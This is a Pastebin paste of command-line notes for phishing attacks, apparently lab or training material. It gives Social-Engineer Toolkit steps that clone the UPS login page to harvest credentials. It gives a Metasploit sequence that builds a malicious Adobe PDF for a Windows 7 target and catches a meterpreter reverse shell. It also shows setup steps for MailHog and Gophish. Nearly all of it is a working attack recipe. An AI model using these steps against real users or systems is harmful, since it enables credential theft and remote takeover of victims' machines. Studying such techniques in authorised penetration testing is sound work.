Advertisement
Shiva108

Phishing with setoolkit, metasploit and gophish

Mar 29th, 2022
3,149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Nim 1.07 KB | None | 0 0
  1. setoolkit
  2. $ sudo setoolkit
  3. set> 1
  4. set> 2
  5. set:webattack>3
  6. set:webattack>2
  7. set:webattack> IP address for the POST back in Harvester/Tabnabbing [$IP]:$IP
  8. set:webattack> Enter the url to clone:https://www.ups.com/lasso/login?loc=en_US
  9.  
  10. metasploit
  11. (note:win 7 target running adobe 8.1.2)
  12. $ msfconsole
  13. msf6 > search adobe pdf
  14. msf6 > use 7
  15. msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > show options
  16. msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
  17. msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
  18. msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  19. msf6 exploit(multi/handler) > show options
  20. msf6 exploit(multi/handler) > set LHOST eth0
  21. msf6 exploit(multi/handler) > exploit
  22. meterpreter > sysinfo
  23. meterpreter > ps
  24.  
  25. gophish
  26. (install mailhog)
  27. $ sudo apt-get -y install golang-go
  28. $ go install github.com/mailhog/MailHog@latest
  29. $ ./MailHog
  30. (install gophish)
  31. $ git clone https://github.com/gophish/gophish.git
  32. $ go build
  33. https://docs.getgophish.com/user-guide/building-your-first-campaign
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement